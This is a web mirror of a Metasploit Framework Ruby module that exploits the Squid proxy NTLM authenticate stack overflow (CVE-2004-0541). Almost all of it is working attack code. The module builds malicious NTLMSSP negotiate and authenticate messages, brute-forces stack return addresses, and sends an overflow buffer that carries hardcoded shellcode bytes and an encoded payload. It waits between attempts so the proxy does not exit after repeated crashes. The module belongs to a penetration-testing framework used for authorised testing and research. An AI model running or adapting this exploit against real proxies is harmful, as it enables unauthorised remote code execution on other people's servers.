Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb
31895 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Brute

10
  include Msf::Exploit::Remote::Tcp

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Squid NTLM Authenticate Overflow',

17
        'Description' => %q{

18
          This is an exploit for Squid\'s NTLM authenticate overflow

19
          (libntlmssp.c). Due to improper bounds checking in

20
          ntlm_check_auth, it is possible to overflow the 'pass'

21
          variable on the stack with user controlled data of a user

22
          defined length.  Props to iDEFENSE for the advisory.

23
        },

24
        'Author' => 'skape',

25
        'References' => [

26
          [ 'CVE', '2004-0541'],

27
          [ 'OSVDB', '6791'],

28
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=107'],

29
          [ 'BID', '10500'],

30
        ],

31
        'Privileged' => false,

32
        'Payload' => {

33
          'Space' => 256,

34
          'MinNops' => 16,

35
          'Prepend' => "\x31\xc9\xf7\xe1\x8d\x58\x0e\xb0\x30\x41\xcd\x80",

36
          'PrependEncoder' => "\x83\xec\x7f"

37


38
        },

39
        'Targets' => [

40
          [

41
            'Linux Bruteforce',

42
            {

43
              'Platform' => 'linux',

44
              'Bruteforce' =>

45
                {

46
                  'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c },

47
                  'Stop' => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc },

48
                  'Step' => 0

49
                }

50
            },

51
          ],

52
        ],

53
        'DisclosureDate' => '2004-06-08',

54
        'DefaultTarget' => 0,

55
        'Notes' => {

56
          'Reliability' => UNKNOWN_RELIABILITY,

57
          'Stability' => UNKNOWN_STABILITY,

58
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

59
        }

60
      )

61
    )

62


63
    register_advanced_options(

64
      [

65
        # We must wait 15 seconds between each attempt so as to prevent

66
        # squid from exiting completely after 5 crashes.

67
        OptInt.new('BruteWait', [ false, 'Delay between brute force attempts', 15 ]),

68
      ]

69
    )

70
  end

71


72
  def brute_exploit(addresses)

73
    site = 'http://' + rand_text_alpha(rand(128)) + '.com'

74


75
    print_status("Trying 0x#{'%.8x' % addresses['Ret']}...")

76
    connect

77


78
    trasnmit_negotiate(site)

79
    transmit_authenticate(site, addresses)

80


81
    handler

82
    disconnect

83
  end

84


85
  def trasnmit_negotiate(site)

86
    negotiate =

87
      "NTLMSSP\x00" + # NTLMSSP identifier

88
      "\x01\x00\x00\x00" + # NTLMSSP_NEGOTIATE

89
      "\x07\x00\xb2\x07" + # flags

90
      "\x01\x00\x09\x00" + # workgroup len/max       (1)

91
      "\x01\x00\x00\x00" + # workgroup offset        (1)

92
      "\x01\x00\x03\x00" + # workstation len/max     (1)

93
      "\x01\x00\x00\x00" # workstation offset      (1)

94


95
    print_status("Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)")

96
    req =

97
      "GET #{site} HTTP/1.1\r\n" +

98
      "Proxy-Connection: Keep-Alive\r\n" +

99
      "Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" +

100
      "\r\n"

101
    sock.put(req)

102
  end

103


104
  def transmit_authenticate(site, addresses)

105
    overflow =

106
      rand_text_alphanumeric(0x20) +

107
      [addresses['Ret']].pack('V') +

108
      [addresses['Valid']].pack('V') +

109
      "\xff\x00\x00\x00"

110
    shellcode = payload.encoded

111
    pass_len = [overflow.length + shellcode.length].pack('v')

112
    authenticate =

113
      "NTLMSSP\x00" + # NTLMSSP identifier

114
      "\x03\x00\x00\x00" + # NTLMSSP_AUTHENTICATE

115
      pass_len + pass_len + # lanman response len/max

116
      "\x38\x00\x00\x00" + # lanman response offset  (56)

117
      "\x01\x00\x01\x00" + # nt response len/max     (1)

118
      "\x01\x00\x00\x00" + # nt response offset      (1)

119
      "\x01\x00\x01\x00" + # domain name len/max     (1)

120
      "\x01\x00\x00\x00" + # domain name offset      (1)

121
      "\x01\x00\x01\x00" + # user name               (1)

122
      "\x01\x00\x00\x00" + # user name offset        (1)

123
      "\x00\x00\x00\x00" + # session key

124
      "\x8b\x00\x00\x00" + # session key

125
      "\x06\x82\x00\x02" + # flags

126
      overflow + shellcode

127


128
    print_status("Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)")

129
    req =

130
      "GET #{site} HTTP/1.1\r\n" +

131
      "Proxy-Connection: Keep-Alive\r\n" +

132
      "Proxy-Authorization: NTLM #{Rex::Text.encode_base64(authenticate)}\r\n" +

133
      "\r\n"

134
    sock.put(req)

135
  end

136
end

137


138